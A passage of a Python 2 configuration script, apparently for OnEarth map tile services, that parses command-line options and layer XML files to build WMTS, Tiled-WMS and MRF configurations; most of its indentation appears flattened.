'-p',
'--projection_config',
action='store',
type='string',
dest='projection_configuration',
help=
'Full path of projection configuration file. Default: $LCDIR/conf/projection.xml'
)
parser.add_option(
"-r",
"--restart_apache",
action="store_true",
dest="restart",
default=False,
help="Restart the Apache server on completion (requires sudo).")
parser.add_option(
"-s",
"--send_email",
action="store_true",
dest="send_email",
default=False,
help="Send email notification for errors and warnings.")
parser.add_option(
'--email_server',
action='store',
type='string',
dest='email_server',
default='',
help=
'The server where email is sent from (overrides configuration file value)')
parser.add_option(
'--email_recipient',
action='store',
type='string',
dest='email_recipient',
default='',
help=
'The recipient address for email notifications (overrides configuration file value)'
)
parser.add_option(
'--email_sender',
action='store',
type='string',
dest='email_sender',
default='',
help=
'The sender for email notifications (overrides configuration file value)')
parser.add_option(
'--email_logging_level',
action='store',
type='string',
dest='email_logging_level',
default='ERROR',
help=
'Logging level for email notifications: ERROR, WARN, or INFO. Default: ERROR'
)
parser.add_option(
'-t',
'--time',
action='store',
type='string',
dest='time',
help=
'ISO 8601 time(s) for single configuration file (conf_file must be specified).'
)
parser.add_option(
"-w",
"--no_wmts",
action="store_true",
dest="no_wmts",
default=False,
help="Do not use configurations for WMTS.")
parser.add_option(
"-x",
"--no_xml",
action="store_true",
dest="no_xml",
default=False,
help="Do not generate getCapabilities and getTileService XML.")
parser.add_option(
"-y",
"--generate_links",
action="store_true",
dest="generate_links",
default=False,
help=
"Generate default/current day links in the archive for time varying layers."
)
parser.add_option(
"-z",
"--no_cache",
action="store_true",
dest="no_cache",
default=False,
help=
"Do not copy cache configuration files and Apache configs to final location."
)
parser.add_option(
'--tmslimits_config',
action='store',
type='string',
dest='tmslimits_configuration',
help=
    'Full path of TileMatrixSetLimits configuration file. Default: $LCDIR/conf/tilematrixsetlimits.xml'
)
parser.add_option(
"--create_mapfile",
action="store_true",
dest="create_mapfile",
default=False,
help="Create MapServer configuration.")
# Read command line args.
(options, args) = parser.parse_args()
# Configuration filename.
configuration_filename = options.layer_config_filename
# Command line set LCDIR.
lcdir = options.lcdir
# Configuration directory.
if options.layer_directory:
configuration_directory = options.layer_directory
else:
configuration_directory = lcdir + '/layers/'
# No XML configurations (getCapabilities, getTileService)
no_xml = options.no_xml
# No cache configuration.
no_cache = options.no_cache
# No Tiled-WMS configuration.
no_twms = options.no_twms
# No WMTS configuration.
no_wmts = options.no_wmts
# Create MapServer configuration.
create_mapfile = options.create_mapfile
# Do restart Apache.
restart = options.restart
# Time for conf file.
configuration_time = options.time
# Skip empty tile generation
skip_empty_tiles = options.skip_empty_tiles
# Generate legends
legend = options.generate_legend
# Generate links
links = options.generate_links
# Projection configuration
if options.projection_configuration:
projection_configuration = options.projection_configuration
else:
projection_configuration = lcdir + '/conf/projection.xml'
# TileMatrixSet configuration
if options.tilematrixset_configuration:
tilematrixset_configuration = options.tilematrixset_configuration
else:
tilematrixset_configuration = lcdir + '/conf/tilematrixsets.xml'
# Archive configuration
if options.archive_configuration:
archive_configuration = options.archive_configuration
else:
archive_configuration = lcdir + '/conf/archive.xml'
# TileMatrixSetLimits configuration
if options.tmslimits_configuration:
tmslimits_configuration = options.tmslimits_configuration
else:
tmslimits_configuration = lcdir + '/conf/tilematrixsetlimits.xml'
# Send email.
send_email = options.send_email
# Email server.
email_server = options.email_server
# Email recipient
email_recipient = options.email_recipient
# Email sender
email_sender = options.email_sender
# Email logging level
logging_level = options.email_logging_level.upper()
# Email metadata replaces sigevent_url
if send_email:
sigevent_url = (email_server, email_recipient, email_sender, logging_level)
else:
sigevent_url = ''
print 'Using ' + lcdir + ' as $LCDIR.'
if no_xml:
log_info_mssg(
"no_xml specified, getCapabilities and getTileService files will be staged only"
)
if no_cache:
log_info_mssg(
"no_cache specified, cache configuration files will be staged only")
restart = False
if not create_mapfile:
log_info_mssg("create_mapfile not specified, no mapfiles will be created")
if no_twms and no_wmts and not create_mapfile:
log_info_mssg(
"no_twms and no_wmts and create_mapfile not specified, nothing to do...exiting"
)
exit()
if configuration_time:
if configuration_filename == None:
print "A configuration file must be specified with --time"
exit()
else:
print "Using time='" + configuration_time + "' for " + configuration_filename
# set location of tools
if os.path.isfile(os.path.abspath(lcdir) + '/bin/oe_create_cache_config'):
depth = os.path.abspath(lcdir) + '/bin'
elif distutils.spawn.find_executable('oe_create_cache_config') != None:
depth = distutils.spawn.find_executable('oe_create_cache_config').split(
'/oe_create_cache_config')[0]
else:
depth = '/usr/bin' # default
# Read XML configuration files.
conf_files = []
wmts_endpoints = {}
twms_endpoints = {}
wms_endpoints = {}
if not options.layer_config_filename:
conf = subprocess.Popen(
'ls ' + configuration_directory + '/*.xml',
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).stdout
for line in conf:
conf_files.append(line.strip())
else:
    # use only the single configuration file when specified
conf_files.append(configuration_filename)
print 'Configuration file(s):'
print conf_files
if conf_files == []:
mssg = 'No configuration files found.'
log_sig_exit('ERROR', mssg, sigevent_url)
for conf in conf_files:
current_conf = conf
try:
# Open file.
config_file = open(conf, 'r')
print('\nUsing config: ' + conf)
except IOError:
log_sig_err(str().join(['Cannot read configuration file: ', conf]),
sigevent_url)
continue
else:
dom = xml.dom.minidom.parse(config_file)
# Get environment
try:
environmentConfig = get_dom_tag_value(dom, 'EnvironmentConfig')
try:
environment = get_environment(environmentConfig, sigevent_url)
except Exception, e:
log_sig_err(str(e), sigevent_url)
continue
except IndexError:
log_sig_err(
'Required <EnvironmentConfig> element is missing in ' + conf,
sigevent_url)
continue
# Get default email server and recipient if not override
if options.email_server == '':
email_server = environment.emailServer
if options.email_recipient == '':
email_recipient = environment.emailRecipient
if options.email_sender == '':
email_sender = environment.emailSender
if send_email:
sigevent_url = (email_server, email_recipient, email_sender,
logging_level)
if email_recipient == '':
log_sig_err("No email recipient provided for notifications.",
sigevent_url)
wmts_getCapabilities = environment.getCapabilities_wmts
twms_getCapabilities = environment.getCapabilities_twms
getTileService = environment.getTileService
# Reprojected layers are handled by a separate script
if dom.getElementsByTagName('ReprojectLayerConfig'):
projection = get_projection('EPSG:3857', projection_configuration,
lcdir, tilematrixset_configuration)
print 'Configuring reprojection layers...'
base_twms_gc = lcdir + '/conf/getcapabilities_base_twms.xml'
base_twms_get_tile_service = lcdir + '/conf/gettileservice_base.xml'
base_wmts_gc = lcdir + '/conf/getcapabilities_base_wmts.xml'
reproject_warnings, reproject_errors = build_reproject_configs(
conf,
tilematrixset_configuration,
wmts=not no_wmts,
twms=not no_twms,
create_gc=not no_xml,
sigevent_url=sigevent_url,
stage_only=no_cache,
base_wmts_gc=base_wmts_gc,
base_twms_gc=base_twms_gc,
base_twms_get_tile_service=base_twms_get_tile_service,
create_mapfile=create_mapfile)
warnings += reproject_warnings
errors += reproject_errors
wmtsEndPoint = environment.wmts_dir
twmsEndPoint = environment.twms_dir
cacheLocation_wmts = environment.cacheLocation_wmts
cacheBasename_wmts = environment.cacheBasename_wmts
cacheLocation_twms = environment.cacheLocation_twms
cacheBasename_twms = environment.cacheBasename_twms
wmts_endpoints[wmtsEndPoint] = WMTSEndPoint(
wmtsEndPoint, cacheLocation_wmts, cacheBasename_wmts,
wmts_getCapabilities, projection)
twms_endpoints[twmsEndPoint] = TWMSEndPoint(
twmsEndPoint, cacheLocation_twms, cacheBasename_twms,
twms_getCapabilities, getTileService, projection)
wms_endpoints[environment.mapfileStagingLocation] = WMSEndPoint(
environment.mapfileStagingLocation,
environment.mapfileLocation,
environment.mapfileLocationBasename,
environment.mapfileConfigLocation,
environment.mapfileConfigBasename)
continue
# Stage layers XML from remote GetCapabilities if config found
if dom.getElementsByTagName('RemoteGetCapabilities'):
remote_warnings, remote_errors = get_remote_layers(conf,
wmts=not no_wmts,
twms=not no_twms,
sigevent_url=sigevent_url,
create_mapfile=create_mapfile)
warnings += remote_warnings
errors += remote_errors
continue
#Vector parameters
try:
vectorType = dom.getElementsByTagName('VectorType')[0].firstChild.nodeValue
try:
mapfileLayerContents = dom.getElementsByTagName(
'MapfileLayerContents')[0].firstChild.nodeValue
except IndexError:
mapfileLayerContents = None
except IndexError:
vectorType = None
mapfileLayerContents = None
#Required parameters
try:
identifier = get_dom_tag_value(dom, 'Identifier')
except IndexError:
log_sig_err('Required <Identifier> element is missing in ' + conf,
sigevent_url)
continue
try:
title = get_dom_tag_value(dom, 'Title')
except IndexError:
log_sig_err('Required <Title> element is missing in ' + conf,
sigevent_url)
continue
try:
is_encoded = False
compression = get_dom_tag_value(dom, 'Compression')
compression = compression.upper()
if compression == "JPG":
compression = "JPEG"
if compression == "PPNG":
compression = "PNG"
if compression == "TIFF":
compression = "TIF"
if compression == "EPNG":
compression = "PNG"
is_encoded = True
if compression not in [
"JPEG", "PNG", "EPNG", "TIF", "LERC", "MVT"
]:
log_sig_err(
'<Compression> must be either JPEG, PNG, TIF, LERC, or MVT in '
+ conf, sigevent_url)
continue
except IndexError:
if vectorType is None:
log_sig_err(
'Required <Compression> element is missing in ' + conf,
sigevent_url)
continue
else:
compression = "None"
try:
tilematrixset = get_dom_tag_value(dom, 'TileMatrixSet')
except:
if vectorType is None:
log_sig_err(
'Required <TileMatrixSet> element is missing in ' + conf,
sigevent_url)
continue
else:
tilematrixset = "None"
try:
emptyTileSize = int(get_dom_tag_value(dom, 'EmptyTileSize'))
except IndexError:
try:
emptyTileSize = ""
emptyTile = get_dom_tag_value(dom, 'EmptyTile')
except IndexError: # Required if EmptyTile is not specified
if vectorType is None:
log_sig_err(
'Required <EmptyTileSize> or <EmptyTile> element is missing in '
+ conf, sigevent_url)
continue
try:
fileNamePrefix = get_dom_tag_value(dom, 'FileNamePrefix')
except IndexError:
log_sig_err(
'Required <FileNamePrefix> element is missing in ' + conf,
sigevent_url)
continue
try:
environmentConfig = get_dom_tag_value(dom, 'EnvironmentConfig')
try:
environment = get_environment(environmentConfig, sigevent_url)
except Exception, e:
log_sig_err(str(e), sigevent_url)
continue
except IndexError:
log_sig_err(
'Required <EnvironmentConfig> element is missing in ' + conf,
sigevent_url)
continue
cacheLocation_wmts = environment.cacheLocation_wmts
cacheBasename_wmts = environment.cacheBasename_wmts
cacheLocation_twms = environment.cacheLocation_twms
cacheBasename_twms = environment.cacheBasename_twms
cacheConfig = cacheLocation_wmts # default to WMTS cache location
wmtsServiceUrl = environment.wmtsServiceUrl
twmsServiceUrl = environment.twmsServiceUrl
# Optional parameters
try:
tiledGroupName = get_dom_tag_value(dom, 'TiledGroupName')
except:
tiledGroupName = identifier.replace("_", " ") + " tileset"
try:
wmsSourceLoc = get_dom_tag_value(dom, 'WMSSourceLoc')
except:
wmsSourceLoc = "Local"
try:
wmsGroupName = get_dom_tag_value(dom, 'WMSGroupName')
except:
wmsGroupName = None
try:
wmsLayerGroupName = get_dom_tag_value(dom, 'WMSLayerGroupName')
except:
wmsLayerGroupName = None
try:
abstract = get_dom_tag_value(dom, 'Abstract')
except:
abstract = identifier + " abstract"
try:
archiveLocation = get_dom_tag_value(dom, 'ArchiveLocation')
except:
archiveLocation = None
try:
static = dom.getElementsByTagName(
'ArchiveLocation')[0].attributes['static'].value.lower() in [
'true'
]
except:
static = True
try:
year = dom.getElementsByTagName(
'ArchiveLocation')[0].attributes['year'].value.lower() in [
'true'
]
except:
year = False
try:
subdaily = dom.getElementsByTagName(
'ArchiveLocation')[0].attributes['subdaily'].value.lower() in [
'true'
]
except:
subdaily = False
try:
archive_root = get_archive(
dom.getElementsByTagName('ArchiveLocation')[0].
attributes['root'].value, archive_configuration)
except:
archive_root = ""
    if archiveLocation is not None:
        archiveLocation = archive_root + archiveLocation
tmsLimits = None
try:
tmsLimitId = get_dom_tag_value(dom, 'TileMatrixSetLimitsId')
tmsLimits = get_tmslimits(tmsLimitId, tmslimits_configuration)
except IndexError:
pass
except ValueError as e:
errors.append(e)
try:
headerFileName = get_dom_tag_value(dom, 'HeaderFileName')
except:
headerFileName = None
try:
dataFileLocation = get_dom_tag_value(dom, 'DataFileLocation')
except:
dataFileLocation = None
try:
indexFileLocation = get_dom_tag_value(dom, 'IndexFileLocation')
except:
indexFileLocation = None
try:
zIndexFileLocation = get_dom_tag_value(dom, 'ZIndexFileLocation')
except:
zIndexFileLocation = None
try:
projection = get_projection(
get_dom_tag_value(dom, 'Projection'), projection_configuration,
lcdir, tilematrixset_configuration)
except IndexError:
log_sig_err('Required <Projection> element is missing in ' + conf,
sigevent_url)
continue
except Exception, e:
log_sig_err(str(e), sigevent_url)
continue
# Modified in 0.9 to allow for multiple versioned colormaps
# Sort out any empty ColorMap tags
colormaps = []
for colormap in dom.getElementsByTagName('ColorMap'):
if colormap.firstChild:
colormaps.append(colormap)
# Set default colormap (if none indicated, picks the last colormap found)
default_colormap = None
if colormaps:
if len(colormaps) == 1:
default_colormap = colormaps[0]
else:
for colormap in colormaps:
if 'default' in colormap.attributes.keys(
) and colormap.attributes['default'].value == 'true':
if default_colormap is not None:
err_msg = 'Multiple <ColorMap> elements have "default=true" attribute but only one is allowed, using ' + colormap.toxml(
)
log_sig_err(err_msg, sigevent_url)
default_colormap = colormap
if len(colormaps) > 1 and default_colormap is None:
default_colormap = colormaps[-1]
err_msg = 'Multiple <ColorMap> elements but none have "default=true" attribute, using ' + default_colormap.toxml(
)
log_sig_err(err_msg, sigevent_url)
# Match <ColorMapLocation> and <ColorMapURL> to colormaps with the same version and set them as attributes of the <ColorMap>
if colormaps:
for colormap in colormaps:
if 'version' not in colormap.attributes.keys():
colormap.attributes['version'] = ''
colormap_value = colormap.firstChild.nodeValue
version = colormap.attributes['version'].value
location = next(
(location.firstChild.nodeValue
for location in environment.colormap_dirs
if location.attributes['version'].value == version), None)
url = next((url.firstChild.nodeValue
for url in environment.colormapUrls
if url.attributes['version'].value == version),
None)
if not location:
location = ''
err_msg = "ColorMapLocation for version '{0}' not defined for environment {1} - Trying colormap path {2}".format(
version, environmentConfig, colormap_value)
log_sig_warn(err_msg, sigevent_url)
if not url:
url = ''
err_msg = "ColorMapURL for version '{0}' not defined for environment {1} - Trying colormap path {2}".format(
version, environmentConfig, colormap_value)
log_sig_warn(err_msg, sigevent_url)
colormap.attributes['url'] = url
colormap.attributes['location'] = location
# Similar treatment as ColorMap for VectorStyleJSON
# Supporting "legacy" tag name for now
stylejson_elems = dom.getElementsByTagName('StyleJSON')
stylejson_elems.extend(dom.getElementsByTagName('VectorStyleJSON'))
stylejsons = []
for stylejson in stylejson_elems:
if stylejson.firstChild:
stylejsons.append(stylejson)
# Set default StyleJSON
default_stylejson = None
if stylejsons:
if len(stylejsons) == 1:
default_stylejson = stylejsons[0]
else:
for stylejson in stylejsons:
if 'default' in stylejson.attributes.keys() and stylejson.attributes['default'].value == 'true':
if default_stylejson is not None:
err_msg = 'Multiple <VectorStyleJSON> elements have "default=true" attribute but only one is allowed, using ' + stylejson.toxml()
log_sig_err(err_msg, sigevent_url)
default_stylejson = stylejson
if len(stylejsons) > 1 and default_stylejson is None:
default_stylejson = stylejsons[-1]
err_msg = 'Multiple <VectorStyleJSON> elements but none have "default=true" attribute, using ' + default_stylejson.toxml()
log_sig_err(err_msg, sigevent_url)
# Match <StyleJSONLocation> and <StyleJSONURL> to style json files with the same version and set them as attributes of the <VectorStyleJSON>
if stylejsons:
for stylejson in stylejsons:
if 'version' not in stylejson.attributes.keys():
stylejson.attributes['version'] = ''
stylejson_value = stylejson.firstChild.nodeValue
version = stylejson.attributes['version'].value
location = next(
(location.firstChild.nodeValue
for location in environment.stylejson_dirs
if location.attributes['version'].value == version), None)
url = next((url.firstChild.nodeValue
for url in environment.stylejsonUrls
if url.attributes['version'].value == version),
None)
if not location:
location = ''
err_msg = "StyleJSONLocation for version '{0}' not defined for environment {1} - Trying VectorStyleJSON path {2}".format(
version, environmentConfig, stylejson_value)
log_sig_warn(err_msg, sigevent_url)
if not url:
url = ''
err_msg = "StyleJSONURL for version '{0}' not defined for environment {1} - Trying VectorStyleJSON path {2}".format(
version, environmentConfig, stylejson_value)
log_sig_warn(err_msg, sigevent_url)
stylejson.attributes['url'] = url
stylejson.attributes['location'] = location
# Similar treatment as VectorStyleJSON for VectorMetadataJSON
metadatajson_elems = dom.getElementsByTagName('MetadataJSON')
metadatajson_elems.extend(dom.getElementsByTagName('VectorMetadataJSON'))
metadatajsons = []
for metadatajson in metadatajson_elems:
if metadatajson.firstChild:
metadatajsons.append(metadatajson)
# Set default VectorMetadataJSON
default_metadatajson = None
if metadatajsons:
if len(metadatajsons) == 1:
default_metadatajson = metadatajsons[0]
else:
for metadatajson in metadatajsons:
if 'default' in metadatajson.attributes.keys(
) and metadatajson.attributes['default'].value == 'true':
if default_metadatajson is not None:
err_msg = 'Multiple <VectorMetadataJSON> elements have "default=true" attribute but only one is allowed, using ' + metadatajson.toxml(
)
log_sig_err(err_msg, sigevent_url)
default_metadatajson = metadatajson
if len(metadatajsons) > 1 and default_metadatajson is None:
default_metadatajson = metadatajsons[-1]
err_msg = 'Multiple <VectorMetadataJSON> elements but none have "default=true" attribute, using ' + default_metadatajson.toxml(
)
log_sig_err(err_msg, sigevent_url)
# Match <MetadataJSONLocation> and <MetadataJSONURL> to metadata json files with the same version and set them as attributes of the <VectorMetadataJSON>
if metadatajsons:
for metadatajson in metadatajsons:
if 'version' not in metadatajson.attributes.keys():
metadatajson.attributes['version'] = ''
metadatajson_value = metadatajson.firstChild.nodeValue
version = metadatajson.attributes['version'].value
location = next(
(location.firstChild.nodeValue
for location in environment.metadatajson_dirs
if location.attributes['version'].value == version), None)
url = next((url.firstChild.nodeValue
for url in environment.metadatajsonUrls
if url.attributes['version'].value == version),
None)
if not location:
location = ''
err_msg = "MetadataJSONLocation for version '{0}' not defined for environment {1} - Trying VectorMetadataJSON path {2}".format(
version, environmentConfig, metadatajson_value)
log_sig_warn(err_msg, sigevent_url)
if not url:
url = ''
err_msg = "MetadataJSONURL for version '{0}' not defined for environment {1} - Trying VectorMetadataJSON path {2}".format(
version, environmentConfig, metadatajson_value)
log_sig_warn(err_msg, sigevent_url)
metadatajson.attributes['url'] = url
metadatajson.attributes['location'] = location
try:
emptyTile = get_dom_tag_value(dom, 'EmptyTile')
except:
emptyTile = None
try:
if emptyTile == None:
emptyTileOffset = dom.getElementsByTagName(
'EmptyTileSize')[0].attributes['offset'].value
else:
emptyTileOffset = dom.getElementsByTagName(
'EmptyTile')[0].attributes['offset'].value
except:
emptyTileOffset = 0
# Patterns
patterns = []
rest_patterns = []
patternTags = dom.getElementsByTagName('Pattern')
for pattern in patternTags:
try:
if pattern.attributes[
'type'].value == "WMTS-REST": # append WMTS REST patterns
rest_patterns.append(pattern.firstChild.data.strip())
else: # assume TWMS key-value pair
patterns.append(pattern.firstChild.data.strip())
except KeyError: # append if type does not exist
patterns.append(pattern.firstChild.data.strip())
# Time
if configuration_time:
times = configuration_time.split(',')
else:
times = []
timeTags = dom.getElementsByTagName('Time')
for time in timeTags:
try:
times.append(time.firstChild.data.strip())
except AttributeError:
times.append('')
# Set End Points
if environment.wmts_dir != None:
wmtsEndPoint = environment.wmts_dir
else: # default projection dir
wmtsEndPoint = lcdir + "/wmts/" + projection.id.replace(":", "")
if environment.twms_dir != None:
twmsEndPoint = environment.twms_dir
else:
# default projection dir
twmsEndPoint = lcdir + "/twms/" + projection.id.replace(":", "")
wmts_endpoints[wmtsEndPoint] = WMTSEndPoint(
wmtsEndPoint, cacheLocation_wmts, cacheBasename_wmts,
wmts_getCapabilities, projection)
twms_endpoints[twmsEndPoint] = TWMSEndPoint(
twmsEndPoint, cacheLocation_twms, cacheBasename_twms,
twms_getCapabilities, getTileService, projection)
wms_endpoints[environment.mapfileStagingLocation] = WMSEndPoint(
environment.mapfileStagingLocation, environment.mapfileLocation,
environment.mapfileLocationBasename,
environment.mapfileConfigLocation,
environment.mapfileConfigBasename)
# Close file.
config_file.close()
log_info_mssg('config: Identifier: ' + identifier)
log_info_mssg('config: Title: ' + title)
log_info_mssg('config: FileNamePrefix: ' + fileNamePrefix)
log_info_mssg('config: TiledGroupName: ' + tiledGroupName)
log_info_mssg('config: Compression: ' + compression)
log_info_mssg('config: TileMatrixSet: ' + tilematrixset)
if wmsSourceLoc:
log_info_mssg('config: WMSSourceLoc: ' + wmsSourceLoc)
if wmsGroupName:
log_info_mssg('config: WMSGroupName: ' + wmsGroupName)
if wmsLayerGroupName:
log_info_mssg('config: WMSLayerGroupName: ' + wmsLayerGroupName)
if emptyTile:
log_info_mssg('config: EmptyTile: ' + emptyTile)
if str(emptyTileSize) != "":
log_info_mssg('config: EmptyTileSize: ' + str(emptyTileSize))
log_info_mssg('config: EmptyTileOffset: ' + str(emptyTileOffset))
if headerFileName:
log_info_mssg('config: HeaderFileName: ' + headerFileName)
if archiveLocation:
log_info_mssg('config: ArchiveLocation static=' + str(static) +
' year=' + str(year) + ' subdaily=' + str(subdaily) +
': ' + archiveLocation)
if dataFileLocation:
log_info_mssg('config: DataFileLocation: ' + dataFileLocation)
if indexFileLocation:
log_info_mssg('config: IndexFileLocation: ' + indexFileLocation)
if zIndexFileLocation:
log_info_mssg('config: ZIndexFileLocation: ' + zIndexFileLocation)
if projection:
log_info_mssg('config: Projection: ' + str(projection.id))
if getTileService:
log_info_mssg('config: GetTileServiceLocation: ' + str(getTileService))
if wmts_getCapabilities:
log_info_mssg('config: WMTS GetCapabilitiesLocation: ' +
str(wmts_getCapabilities))
if twms_getCapabilities:
log_info_mssg('config: TWMS GetCapabilitiesLocation: ' +
str(twms_getCapabilities))
if cacheLocation_wmts:
log_info_mssg('config: WMTS CacheLocation: ' + str(cacheLocation_wmts))
if cacheLocation_twms:
log_info_mssg('config: TWMS CacheLocation: ' + str(cacheLocation_twms))
if cacheBasename_wmts:
        log_info_mssg('config: WMTS Basename: ' + str(cacheBasename_wmts))
if cacheBasename_twms:
        log_info_mssg('config: TWMS Basename: ' + str(cacheBasename_twms))
if wmtsEndPoint:
log_info_mssg('config: WMTSEndPoint: ' + str(wmtsEndPoint))
if twmsEndPoint:
log_info_mssg('config: TWMSEndPoint: ' + str(twmsEndPoint))
if tmsLimits:
log_info_mssg('config: TileMatrixSetLimits: ' + tmsLimits.toxml())
if colormaps:
for colormap in colormaps:
map_value = colormap.firstChild.nodeValue.strip()
log_info_mssg('config: ColorMap: ' + str(map_value))
if stylejsons:
for stylejson in stylejsons:
json_value = stylejson.firstChild.nodeValue.strip()
log_info_mssg('config: VectorStyleJSON: ' + str(json_value))
if metadatajsons:
for metadatajson in metadatajsons:
json_value = metadatajson.firstChild.nodeValue.strip()
log_info_mssg('config: VectorMetadataJSON: ' + str(json_value))
log_info_mssg('config: Patterns: ' + str(patterns))
if len(rest_patterns) > 0:
log_info_mssg('config: WMTS-REST Patterns: ' + str(rest_patterns))
if len(times) > 0:
log_info_mssg('config: Time: ' + str(times))
if archiveLocation != None:
archiveLocation = add_trailing_slash(archiveLocation)
# check if absolute path or else use relative to cache location
if archiveLocation[0] == '/':
mrfLocation = archiveLocation
else:
mrfLocation = cacheConfig + archiveLocation
archiveLocation = mrfLocation
else: # use archive location relative to cache if not defined
mrfLocation = add_trailing_slash(cacheConfig)
if year == True:
if archiveLocation != None:
mrfLocation = mrfLocation + 'YYYY/'
else:
mrfLocation = mrfLocation + fileNamePrefix + '/YYYY/'
if static == True:
mrf = mrfLocation + fileNamePrefix + '.mrf'
else:
if subdaily == True:
mrf = mrfLocation + fileNamePrefix + 'TTTTTTTTTTTTT_.mrf'
else:
mrf = mrfLocation + fileNamePrefix + 'TTTTTTT_.mrf'
if indexFileLocation == None:
if archiveLocation != None and archiveLocation[0] == '/':
# use absolute path of archive
indexFileLocation = mrf.replace('.mrf', '.idx')
else:
# use relative path to cache
indexFileLocation = mrf.replace(cacheConfig, '').replace(
'.mrf', '.idx')
if dataFileLocation == None:
if archiveLocation != None and archiveLocation[0] == '/':
# use absolute path of archive
dataFileLocation = mrf
else:
# use relative path to cache
dataFileLocation = mrf.replace(cacheConfig, '')
if compression.lower() in ['jpg', 'jpeg']:
dataFileLocation = dataFileLocation.replace('.mrf', '.pjg')
mrf_format = 'image/jpeg'
elif compression.lower() in ['tif', 'tiff']:
dataFileLocation = dataFileLocation.replace('.mrf', '.ptf')
mrf_format = 'image/tiff'
elif compression.lower() in ['lerc']:
dataFileLocation = dataFileLocation.replace('.mrf', '.lrc')
mrf_format = 'image/lerc'
elif compression.lower() in ['mvt']:
compression = "MVT"
dataFileLocation = dataFileLocation.replace('.mrf', '.pvt')
mrf_format = 'application/vnd.mapbox-vector-tile'
elif vectorType is not None:
dataFileLocation = dataFileLocation.replace('.mrf', '.shp')
else:
dataFileLocation = dataFileLocation.replace('.mrf', '.ppg')
mrf_format = 'image/png'
if zIndexFileLocation == None:
if archiveLocation != None and archiveLocation[0] == '/':
# use absolute path of archive
zIndexFileLocation = mrf
else:
# use relative path to cache
zIndexFileLocation = mrf.replace(cacheConfig, '')
zIndexFileLocation = zIndexFileLocation.replace('.mrf', '.zdb')
# Parse header filename. Default is to use the 'mrf' filename.
header_type = None
header_file_name = mrf
try:
headerFileName = dom.getElementsByTagName('HeaderFileName')[0]
header_file_name = get_dom_tag_value(dom, 'HeaderFileName')
except (AttributeError, IndexError):
pass
try:
header_type = headerFileName.getAttribute('type')
except AttributeError:
pass
if not vectorType:
# Open MRF header if one has been supplied (except if "type" attr is "prefix")
header_dom = None
if header_type != 'prefix':
try:
with open(header_file_name, 'r') as mrf_file:
try:
header_dom = xml.dom.minidom.parse(mrf_file)
except:
log_sig_err(
'Badly-formatted MRF header file: {0}'.format(
mrf_file), sigevent_url)
continue
except IOError:
log_sig_err(
"Can't open MRF file: {0}".format(header_file_name),
sigevent_url)
continue
# Create base MRF document. We'll be adding stuff from either the header MRF or the
# layer config file to this.
mrf_impl = xml.dom.minidom.getDOMImplementation()
mrf_dom = mrf_impl.createDocument(None, 'MRF_META', None)
mrf_meta = mrf_dom.documentElement
# Create <Raster> tag
raster_node = mrf_dom.createElement('Raster')
# If the "prefix" attribute of <HeaderFileName> is present, we grab MRF stuff from the
# layer config file. Otherwise, use the header file specified.
if header_type == 'prefix':
mrf_base = header_file_name + '.mrf'
header_dom = dom
log_info_mssg('Using MRF data within layer config file')
else:
log_info_mssg('Using MRF Archetype: ' + header_file_name)
mrf_base = os.path.basename(header_file_name)
if header_dom != None:
# Check if <Size> tag present and has all 3 required values (x,y,c)
try:
size_node = header_dom.getElementsByTagName('Size')[0]
except IndexError:
log_sig_err(
"<Size> tag not present in MRF header file or layer config",
sigevent_url)
continue
if size_node != None:
if not all(attr in size_node.attributes.keys()
for attr in ('x', 'y')):
log_sig_err("<Size> tag needs to have attributes x and y",
sigevent_url)
continue
else:
raster_node.appendChild(size_node)
bands = size_node.getAttribute('c')
# Create <Compression> node
compression_node = mrf_dom.createElement('Compression')
compression_text_node = mrf_dom.createTextNode(compression)
compression_node.appendChild(compression_text_node)
raster_node.appendChild(compression_node)
# Check if <DataValues> tag is present and the NoData attribute is present
try:
datavalues_node = header_dom.getElementsByTagName(
'DataValues')[0]
except IndexError:
datavalues_node = None
finally:
if datavalues_node is not None:
raster_node.appendChild(datavalues_node)
# Check if the <Quality> tag is present and of a valid type
try:
quality_node = header_dom.getElementsByTagName('Quality')[0]
except IndexError:
quality_node = None
if quality_node is not None:
                try:
                    quality_value = int(quality_node.firstChild.nodeValue)
                except (TypeError, ValueError):
                    quality_value = None
                if quality_value is None or quality_value < 1 or quality_value > 100:
                    log_sig_err(
                        "<Quality> tag must be an integer between 1 and 100",
                        sigevent_url)
                    continue
                else:
                    raster_node.appendChild(quality_node)
# Check if <PageSize> node is present and has c, x, and y attributes
try:
page_size_node = header_dom.getElementsByTagName('PageSize')[0]
except IndexError:
page_size_node = None
log_sig_err(
"<PageSize> tag not present in MRF header file or layer config",
sigevent_url)
continue
if page_size_node is not None:
if all(attr in page_size_node.attributes.keys()
for attr in ('x', 'y')):
raster_node.appendChild(page_size_node)
else:
log_sig_err("<PageSize> requires x, and y attributes",
sigevent_url)
continue
# Add <Raster> tag to MRF
mrf_meta.appendChild(raster_node)
# Create <Rsets>
try:
rsets_node = header_dom.getElementsByTagName('Rsets')[0]
except IndexError:
rsets_node = None
log_sig_err(
"<Rsets> tag not present in layer config or MRF header file",
sigevent_url)
continue
if rsets_node is not None:
try:
scale_attribute = rsets_node.getAttribute('scale')
except:
log_sig_err("Attribute 'scale' not present in <Rsets> tag",
sigevent_url)
continue
else:
try:
if scale_attribute:
if int(scale_attribute
) != projection.tilematrixsets[
tilematrixset].scale:
log_sig_err(
"Overview scales do not match - " +
tilematrixset + ": " + str(
str(projection.tilematrixsets[
tilematrixset].scale)) + ", " +
"Provided: " + scale_attribute,
sigevent_url)
continue
if projection.tilematrixsets[tilematrixset].levels > 1:
rsets_node.setAttribute(
'scale',
str(projection.tilematrixsets[tilematrixset].
scale))
except KeyError:
log_sig_err(
"Invalid TileMatrixSet " + tilematrixset +
" for projection " + projection.id, sigevent_url)
continue
# Add data file locations
dataFileNameElement = mrf_dom.createElement('DataFileName')
dataFileNameElement.appendChild(
mrf_dom.createTextNode(dataFileLocation))
indexFileNameElement = mrf_dom.createElement('IndexFileName')
indexFileNameElement.appendChild(
mrf_dom.createTextNode(indexFileLocation))
rsets_node.appendChild(dataFileNameElement)
rsets_node.appendChild(indexFileNameElement)
# Add zindex file name
has_zdb = False
if size_node.hasAttribute('z'):
z_index_node = mrf_dom.createElement('ZIndexFileName')
z_index_text_node = mrf_dom.createTextNode(zIndexFileLocation)
z_index_node.appendChild(z_index_text_node)
rsets_node.appendChild(z_index_node)
has_zdb = True
mrf_meta.appendChild(rsets_node)
# Create GeoTags
geotag_node = mrf_dom.createElement('GeoTags')
# Check for bounding box
try:
bounding_box_node = header_dom.getElementsByTagName(
'BoundingBox')[0]
except IndexError:
